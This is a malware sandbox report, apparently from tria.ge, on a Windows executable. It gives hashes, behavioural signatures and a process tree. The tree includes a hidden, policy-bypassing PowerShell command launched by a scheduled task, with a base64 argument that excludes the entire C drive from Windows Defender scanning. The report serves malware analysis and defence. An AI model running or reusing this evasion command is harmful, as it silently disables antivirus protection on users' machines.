Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
82s -
max time network
45s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
12/09/2022, 15:26
Static task
static1
Behavioral task
behavioral1
Sample
56db3f2732926357632cd95d020dd6abbdee2f40596deafd9c9ce849cc5cf86c.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
56db3f2732926357632cd95d020dd6abbdee2f40596deafd9c9ce849cc5cf86c.exe
Resource
win10v2004-20220812-en
General
-
Target
56db3f2732926357632cd95d020dd6abbdee2f40596deafd9c9ce849cc5cf86c.exe
-
Size
2.4MB
-
MD5
a0b623e5db90e7b7f91a350fcbfd661b
-
SHA1
12e71a986e8f65a19c7e7a99da8c049c70f533b5
-
SHA256
56db3f2732926357632cd95d020dd6abbdee2f40596deafd9c9ce849cc5cf86c
-
SHA512
c75234cea7a872c7314a895d17ce6ff1a20f28f76631f21ca6f4e9fc8baf39287fe1d6bc0bf0b4005ca25c4816cebb4e91146d074e24308b702e45e78c2c00ca
-
SSDEEP
49152:7Rozi307t/SoJvnGjQUlJrQu6Kci17kejlkH1og/61H99GoBKxCdMr0B0IaV2aLh:7RoziE7JnGkUTrQfipjlkuH1HbGVxCdI
Malware Config
Signatures
-
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 1100 56db3f2732926357632cd95d020dd6abbdee2f40596deafd9c9ce849cc5cf86c.exe 1100 56db3f2732926357632cd95d020dd6abbdee2f40596deafd9c9ce849cc5cf86c.exe 1100 56db3f2732926357632cd95d020dd6abbdee2f40596deafd9c9ce849cc5cf86c.exe 1100 56db3f2732926357632cd95d020dd6abbdee2f40596deafd9c9ce849cc5cf86c.exe 1100 56db3f2732926357632cd95d020dd6abbdee2f40596deafd9c9ce849cc5cf86c.exe 1160 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1100 56db3f2732926357632cd95d020dd6abbdee2f40596deafd9c9ce849cc5cf86c.exe Token: SeDebugPrivilege 1160 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 632 wrote to memory of 1160 632 taskeng.exe 31 PID 632 wrote to memory of 1160 632 taskeng.exe 31 PID 632 wrote to memory of 1160 632 taskeng.exe 31
Processes
-
C:\Users\Admin\AppData\Local\Temp\56db3f2732926357632cd95d020dd6abbdee2f40596deafd9c9ce849cc5cf86c.exe"C:\Users\Admin\AppData\Local\Temp\56db3f2732926357632cd95d020dd6abbdee2f40596deafd9c9ce849cc5cf86c.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1100
-
C:\Windows\system32\taskeng.exetaskeng.exe {22D7CA5E-F0EA-4A7C-BA0D-7007106BE00B} S-1-5-21-2292972927-2705560509-2768824231-1000:GRXNNIIE\Admin:S4U:1⤵
- Suspicious use of WriteProcessMemory
PID:632 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1160
-